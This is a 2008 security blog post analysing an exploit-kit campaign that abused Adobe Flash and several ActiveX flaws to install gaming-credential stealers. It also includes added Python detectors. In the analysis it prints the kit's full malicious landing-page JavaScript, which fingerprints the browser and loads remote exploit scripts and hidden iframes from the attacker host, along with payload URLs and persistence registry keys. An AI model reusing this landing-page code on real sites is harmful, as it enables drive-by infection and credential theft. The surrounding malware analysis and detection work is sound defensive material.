Wednesday, May 28, 2008

Adobe Flash Player Exploitation

Several sources, including Symantec DeepSight, SANS ISC, and Dancho Danchev, have reported in-the-wild exploitation of a vulnerability affecting Adobe Flash Player. The vulnerability was originally thought to be a 0-day, but analysis has revealed it is more likely the previously reported Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability (CVE-2007-0071). Adobe Flash Player 9.0.115.0 is affected, and there are conflicting reports on whether, and to what degree, the current version 9.0.124.0 is affected. Initial websites serving Flash exploit code include dota11.cn, wuqing17173.cn, woai117.cn, and play0nlnie.com. Script references to these sites (and a growing number of others) are believed to have been injected into legitimate websites through SQL injection attacks. The malicious sites use a Chinese MPack-type tool to generate numerous exploits in an effort to install PSW.OnlineGames trojans designed to exfiltrate gaming credentials. The following provides a sample analysis of wuqing17173.cn.

wuqing17173.cn Analysis:


A Google search for the identified malicious domain wuqing17173.cn (58.215.87.11) currently returns a single result that includes an injected iframe for count18[dot]wuqing17173[dot]cn/click.aspx.php.

The compromised accttstore.com site hosting the count18[dot]wuqing17173[dot]cn iframe sells World of Warcraft (WoW) assets. The adversary's end goal is to exfiltrate online gaming credentials, so websites dedicated to WoW are prime targets for injected iframe and script redirects.

The count18[dot]wuqing17173[dot]cn/click.aspx.php connection returns what looks to be an HTTP 404 error, but the bottom of the page contains malicious JavaScript. The script checks for several ActiveX controls and, if they are present, redirects the victim to specific exploit code hosted at www[dot]0novel[dot]com (58.215.87.11). The script attempts to exploit the following vulnerabilities.

File: Flash.swf, Flash1.swf
Vulnerability: Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability
CVE: CVE-2007-0071 (BID 28695)

File: ms06014.js
Vulnerability: MDAC RDS.Dataspace ActiveX Control Vulnerability
CVE: CVE-2006-0003

File: Real.js
Vulnerability: RealPlayer IERPCtl ActiveX Playlist Handling Buffer Overflow Vulnerability
CVE: CVE-2007-5601

File: Lz.htm
Vulnerability: Ourgame GLWorld ActiveX Control Multiple Buffer Overflow Vulnerabilities
CVE: CVE-2008-0647

File: Bf.htm
Vulnerability: Baofeng Storm ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
CVE: CVE-2007-4816, CVE-2007-4943

File: Xl.htm
Vulnerability: Xunlei Thunder DapPlayer ActiveX Control Buffer Overflow
CVE: CVE-2007-6144

count18[dot]wuqing17173[dot]cn/click.aspx.php code:

<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="....";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.0novel.com\/ms06014.js><\/script>")}
else
{
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
if(Flashver[2] == 47){document.write('<embed src="flash1.swf"></embed>');}
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<script src=http:\/\/www.0novel.com\/real.js><\/script>')}
else
{
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
<embed sRc=flash.swf width=50 height=0></embed>
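As an added defender-side example (not code from the original post), the following Python scans a captured landing page for the fingerprinting pattern shown above: it folds the split string literals the script uses to hide the RealPlayer ProgID, lists which of the probed ActiveX controls appear, and checks for the Flash version gate and the hidden iframe/embed/script writes. The embedded sample page is a constructed excerpt modelled on the quoted code, with the kit host replaced by the placeholder kit.example.invalid; the function names are my own.

```python
import re

# Constructed sample modelled on the click.aspx.php landing page quoted above (not the live
# page); the kit host is replaced by the placeholder kit.example.invalid.
SAMPLE_HTML = r"""<html><body><h1>404 Not Found</h1>
<Script Language="JScript">
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");
var storm=new ActiveXObject("MPS.StormPlayer.1");
document.write('<iframe style=display:none src=bf.htm></iframe>')
document.write("<script src=http:\/\/kit.example.invalid\/ms06014.js><\/script>")
</script>
<embed sRc=flash.swf width=50 height=0></embed>
</body></html>"""

# ProgIDs the landing page probes (Flash, RealPlayer, GLWorld, Baofeng Storm, Xunlei Thunder).
PROBED_PROGIDS = {"ShockwaveFlash.ShockwaveFlash.9", "IERPCtl.IERPCtl.1", "GLIEDown.IEDown.1",
                  "MPS.StormPlayer.1", "DPClient.Vod"}
RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"  # MDAC RDS.DataSpace, MS06-014 path
_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')

def fold_strings(js):
    """Join "a"+"b" literals so a split ProgID like "IERP"+"Ctl.I"+"ERPCtl.1" becomes matchable."""
    prev = None
    while prev != js:
        prev, js = js, _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), js)
    return js

def scan_landing_page(html):
    """Collect the fingerprinting and delivery indicators present in a captured page."""
    js = fold_strings(html)
    progids = set(re.findall(r'ActiveXObject\(\s*"([^"]+)"', js))
    return {
        "probed_controls": sorted(progids & PROBED_PROGIDS),
        "rds_dataspace_clsid": RDS_DATASPACE_CLSID.lower() in js.lower(),
        # the kit serves the SWF only to Flash 9.0.115 / 9.0.47 victims
        "flash_version_gate": "$version" in js and re.search(r'\[2\]\s*==\s*(115|47)', js) is not None,
        "hidden_iframes": re.findall(r'<iframe[^>]*(?:display:\s*none|height=0)[^>]*>', js, re.I),
        "hidden_embeds": re.findall(r'<embed[^>]*height=0[^>]*>', js, re.I),
        "written_scripts": [u.replace('\\/', '/') for u in re.findall(r'document\.write\([^)]*<script src=([^>\s]+)', js, re.I)],
    }

def is_exploit_kit_landing(findings):
    """Flag a page that probes several known-vulnerable controls and then injects hidden content."""
    delivery = findings["hidden_iframes"] or findings["hidden_embeds"] or findings["written_scripts"]
    return len(findings["probed_controls"]) >= 2 and bool(delivery)
```

Run it over proxy or web-cache captures of pages that return a 404 body; a page that fails the version gate still reveals the probe set, which is the part worth alerting on.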


The strings of Flash.swf include the payload URL http: //www[dot]lovedai[dot]cn/back.css (58.215.87.11), which is executed as c:\6123t.exe. The payload for the other exploits was www[dot]0novel[dot]com/back.css (58.215.87.11).

Flash.swf strings:

FWS
fHY<

`P3
t.x
urlmon.dll
SSR
;C:\6123t.exe
ahU
http: //www[dot]lovedai[dot]cn/back.css
t.x
C
new_fla MainTimeline
flash.display
MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Spritenew_fla.MainTimeline

Malware Analysis:

The malware back.css is a binary file designed to look like a cascading style sheet. It creates backow.dll in the victim's Temp directory and creates and deletes C:\w1.hiv and C:\w2.hiv. backow.dll is detected as an Infostealer.Gampass variant (Symantec), designed to exfiltrate World of Warcraft (WoW) online gaming accounts.

Filename: back.css
MD5: 54939e5ffb291518a1fb0f28a92faf41
Size: 25.7 KB (26,368 bytes)

Back.css creates:

C:\Documents and Settings\username\Local Settings\Temp\backow.dll

Filename: backow.dll
MD5: 86909167e5b867ea509bd91dba6add03
Size: 14.2 KB (14,592 bytes)

The binary strings of backow.dll reveal WoW domains and the file realmlist.wtf, a WoW text file that tells the WoW client which server to connect to.

00003134 00403D34 0 realmlist.wtf
0000317C 00403D7C 0 .worldofwarcraft.com
0000319C 00403D9C 0 .wowchina.com


Back.css creates the following registry keys:

HKEY_CURRENT_USER\Software\ComWaraisn "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
HKEY_CURRENT_USER\Software\ComWaraisn "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4} "(Default)"
Type: REG_SZ
Data: Windows
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
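An added triage example (not from the original post) for the persistence mechanism in the keys above: it cross-references each ShellExecuteHooks CLSID with its InProcServer32 path and flags hook DLLs loaded from user-writable locations such as Temp, and it lists any other key that stores the same CLSID as a value name (the ComWaraisn marker). The snapshot is constructed from the keys listed above plus one hypothetical benign hook with a placeholder CLSID as a control case; the function name is my own.

```python
import re

# Constructed registry snapshot: the keys listed above as (key, value name, data) tuples, plus one
# hypothetical benign hook (placeholder CLSID, DLL under system32) as a control case.
MALICIOUS_CLSID = "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
CONTROL_CLSID = "{00000000-0000-0000-0000-000000000001}"  # placeholder, not a real component
HOOKS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
SNAPSHOT = [
    (r"HKEY_CURRENT_USER\Software\ComWaraisn", MALICIOUS_CLSID, ""),
    (r"HKEY_CURRENT_USER\Software\ComWaraisn", "{AEB6717E-7E19-11d0-97EE-00C04FD91972}", ""),
    (r"HKEY_CLASSES_ROOT\CLSID\%s" % MALICIOUS_CLSID, "(Default)", "Windows"),
    (r"HKEY_CLASSES_ROOT\CLSID\%s\InProcServer32" % MALICIOUS_CLSID, "(Default)",
     r"C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll"),
    (r"HKEY_CLASSES_ROOT\CLSID\%s\InProcServer32" % MALICIOUS_CLSID, "ThreadingModel", "Apartment"),
    (HOOKS_KEY, MALICIOUS_CLSID, ""),
    (r"HKEY_CLASSES_ROOT\CLSID\%s\InProcServer32" % CONTROL_CLSID, "(Default)",
     r"C:\WINDOWS\system32\example_hook.dll"),
    (HOOKS_KEY, CONTROL_CLSID, ""),
]

# Directories an unprivileged user can write to; a shell hook DLL has no business living there.
USER_WRITABLE = re.compile(r"\\(temp|docume~1|documents and settings|users|appdata)\\", re.I)
_INPROC = re.compile(r"^HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]{36}\})\\InProcServer32$", re.I)

def audit_shell_execute_hooks(snapshot):
    """Resolve every ShellExecuteHooks CLSID to its InProcServer32 DLL and flag suspicious ones."""
    servers = {}  # CLSID -> DLL path
    for key, name, data in snapshot:
        m = _INPROC.match(key)
        if m and name == "(Default)":
            servers[m.group(1).upper()] = data
    report = []
    for key, name, _ in snapshot:
        if key.lower() != HOOKS_KEY.lower():
            continue
        clsid = name.upper()
        dll = servers.get(clsid)
        # any other key storing this CLSID as a value name is an installer marker (ComWaraisn above)
        markers = [k for k, n, _ in snapshot
                   if n.upper() == clsid and k.lower() != HOOKS_KEY.lower()]
        suspicious = dll is None or USER_WRITABLE.search(dll) is not None
        report.append({"clsid": clsid, "dll": dll, "marker_keys": markers, "suspicious": suspicious})
    return report
```

On a live host the same tuples can be produced from a `reg export` of the three hives, so the logic runs unchanged against an exported snapshot rather than the running registry.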